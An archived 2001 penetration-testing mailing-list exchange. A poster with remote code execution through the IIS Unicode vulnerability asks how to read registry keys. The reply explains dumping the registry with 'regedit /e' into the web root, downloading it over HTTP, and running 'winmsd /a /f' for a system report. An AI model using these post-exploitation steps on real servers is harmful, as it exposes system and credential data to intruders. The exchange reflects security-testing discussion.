regedit is nice. Allows you to import and export registry information to and from a text file. regedit /e c:\inetpub\wwwroot\registry.txt Will dump a copy of the registry to text file (all you have access to read anyway). When just view it with your browser. http://target/registry.txt Goes without saying this will be a VERY large file. It is possible to dump only parts of the registry with the regedit command. Can't remember how to do this off the top of my head. Have a look hear. http://www.microsoft.com/technet another good command to use with the Unicode exploit is winmsd /a /f This writes a system report to text file. This gives you a lot of really useful information. The text file will be the name of the computer and is written to your working directory. Note: This only works on IIS 4 (NT 4). If anyone knows of a way to get this information on windows 2000 please let me know. P -----Original Message----- From: Esmerelda Fruitenschlein [mailto:efruitenschleinat_private] Sent: Friday, 5 October 2001 9:05 a.m. To: pen-testat_private Subject: Accessing registry through command line I have remote execution of code through a unicode vulnerability on an IIS box. I need to know if there is a way to get registry keys using only command line tools that are on a default NT install. (No file upload, not even using echo >, etc.) Perhaps something using rundll or somesuch thing? Thanks. Esmerelda Fruitenschlein, hacker extraordinaire _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ ************************************************************ CAUTION: This e-mail and any attachment(s) contains information that is both confidential and possibly legally privileged. No reader may make any use of its content unless that use is approved by Deloitte separately in writing. Any opinion, advice or information contained in this e-mail and any attachment(s) is to be treated as interim and provisional only and for the strictly limited purpose of the recipient as communicated to us. Neither the recipient nor any other person should act upon it without our separate written authorisation of reliance. If you have received this message in error please notify us immediately and destroy this message. Thank you. Deloitte Touche Tohmatsu Internet: www.deloitte.co.nz ************************************************************ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Fri Oct 05 2001 - 18:42:49 PDT